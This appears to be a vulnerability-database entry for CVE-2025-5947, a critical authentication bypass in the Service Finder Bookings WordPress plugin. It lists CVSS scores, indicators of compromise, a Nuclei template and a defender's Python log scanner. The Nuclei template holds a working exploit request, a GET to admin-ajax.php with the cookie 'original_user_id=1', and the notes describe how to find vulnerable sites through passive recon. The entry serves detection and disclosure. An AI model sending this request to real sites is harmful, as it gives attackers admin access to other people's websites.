CVE-2025-5947
published 2025-08-01

CVE-2025-5947: The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via authentication bypass in all versions up to, and including, 6.0…

Priority: P187 · critical · 9.8 (CVSS 3.1)
CVSS vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Exploited in the wild (ITW exploit) · VulnCheck KEV · Initial access
EPSS: 5.70% (92.0th percentile)
The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via authentication bypass in all versions up to, and including, 6.0. This is due to the plugin not properly validating a user's cookie value prior to logging them in through the service_finder_switch_back() function. This makes it possible for unauthenticated attackers to log in as any user, including admins.

Affected

1 range
Vendor    | Product                  | Version range | Fixed in
aonetheme | service_finder_bookings  | <= 6.0        |

Detection & IOCs (extracted from sources)

cookie: original_user_id=1
url: /wp-admin/admin-ajax.php?action=service_finder_switch_back
path: /wp-content/plugins/sf-booking/
nuclei template
id: CVE-2025-5947
info:
  name: Service Finder Bookings - Authentication Bypass
  author: sedat4ras
  severity: critical
http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
        Host: {{Hostname}}
        Cookie: original_user_id=1
    # matchers belong to the request entry, not the top level of the template
    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?i)Location:.*\/wp-admin\/'
      - type: regex
        part: header
        regex:
          - '(?i)Set-Cookie:.*wordpress_logged_in_'
      - type: status
        status:
          - 301
          - 302
  • Exploit requests are HTTP GET to /wp-admin/admin-ajax.php with the query parameter switch_back=1 and a manipulated original_user_id cookie value (e.g., =1 for admin).
  • Review access logs for suspicious newly created accounts that may have been added for persistence after exploitation.
  • Presence of the sf-booking plugin directory at /wp-content/plugins/sf-booking/ can be used to identify vulnerable targets via passive recon (publicwww).
  • The vulnerability only affects Service Finder Bookings plugin versions up to and including 6.0; version 6.1 (released July 17) contains the fix.
  • Attacker IP addresses used for the campaign are not static; blocklisting the five identified IPs is a partial mitigation only, as attackers can rotate to new ones.
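A defender-side check over proxy/WAF request records for the pattern described above, as an added example that is not part of the advisory, the plugin or the Nuclei template. It assumes a log source that records the request target and the Cookie header (a plain Apache/nginx combined log carries no cookies, so only the action indicator can fire there); the sample records are constructed.

```python
from urllib.parse import urlsplit, parse_qs

AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "service_finder_switch_back"   # AJAX action behind service_finder_switch_back()

# Constructed sample records: (client_ip, request_target, cookie_header)
SAMPLE_REQUESTS = [
    ("198.51.100.7", "/wp-admin/admin-ajax.php?action=service_finder_switch_back",
     "original_user_id=1"),
    ("198.51.100.7", "/wp-admin/admin-ajax.php?action=service_finder_switch_back",
     "wordpress_logged_in_abc=editor%7C123; original_user_id=1"),
    ("203.0.113.9", "/wp-admin/admin-ajax.php?action=heartbeat",
     "wordpress_test_cookie=WP+Cookie+check"),
    ("203.0.113.9", "/index.php?action=service_finder_switch_back", "original_user_id=1"),
]


def parse_cookies(header):
    """Split a raw Cookie header into a name -> value dict."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = value.strip()
    return cookies


def classify(target, cookie_header):
    """Return the indicator names a single request matches (empty list = benign)."""
    url = urlsplit(target)
    if url.path != AJAX_PATH or ACTION not in parse_qs(url.query).get("action", []):
        return []
    hits = ["switch_back_action"]           # the vulnerable AJAX action is being invoked
    cookies = parse_cookies(cookie_header)
    if "original_user_id" in cookies:
        hits.append("original_user_id_cookie")   # the cookie the plugin trusts without validation
        if cookies["original_user_id"] == "1":
            hits.append("targets_user_id_1")     # user ID 1 is the first admin on most installs
    if not any(name.startswith("wordpress_logged_in_") for name in cookies):
        hits.append("no_wp_session_cookie")      # switch-back without any WordPress session
    return hits


def scan(records):
    """Return [(client_ip, hits)] for every record matching at least one indicator."""
    flagged = []
    for client_ip, target, cookie_header in records:
        hits = classify(target, cookie_header)
        if hits:
            flagged.append((client_ip, hits))
    return flagged
```

Feed it from the proxy's JSON or CSV export and alert on any hit list containing original_user_id_cookie; a switch-back call with no WordPress session cookie at all is the strongest signal.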

CVSS provenance

nvd (v3.1): 9.8 CRITICAL — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck: 9.8 CRITICAL